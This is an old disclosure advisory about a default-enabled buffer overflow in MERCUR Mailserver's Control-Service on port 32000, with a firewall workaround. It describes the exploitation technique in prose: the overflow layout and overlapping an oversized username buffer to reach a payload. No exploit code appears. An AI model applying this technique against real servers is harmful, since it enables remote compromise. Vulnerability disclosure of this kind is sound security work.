MERCUR Mailserver advisory/remote exploit

2c79cbe14ac7d0b8472d3f129fa1df55 Security Adisory #3

#PRODUCT

Atrium Software International's
MERCUR Mailserver, All Versions

#DESCRIPTION

MERCUR Mailserver's Control-Service, installed and
activated by default on port 32000, is vulnerable to
the classic buffer overflow on it's password
argument… an exploit for MERCUR 4.2 (current) is
included and it has been tested against both win2k and
winxp pro…

<260 bytes><EBP><EIP>

as you can see, I'm too lazy to write my own shellcode
to fit in that wee little 260 byte buffer… and we
can't choose the right side as anything over a few
bytes will end up overwriting what will become the
contents of ECX prior to our target RET, causing an
early exception… so a sexy little trick is in order…

we just abuse the fact that an invalid username, one
of a very large length, is copied and stays resident
in local memory when we overrun the password buffer…
sizing these two buffers correctly, and we can have
them overlap each other, allowing us to jump from the
password buffer to our payload (username buffer)
easily… YIPPPEE!@!#

#FIX/PATCH/WORKAROUND

no patch this time, as a workaround is simple… MERCUR
allows you to restrict access to each service
individually under the Security -> Firewall options…
32000 should be restricted on default, and I would
guess it soon may be…

sorry about the winamp patch, who the hell knew winrar
uses a proprietary zip format…

symantec's #1 fan,
2c79cbe14ac7d0b8472d3f129fa1df55

Do You Yahoo!?
Yahoo! Autos - Get free new car price quotes
http://autos.yahoo.com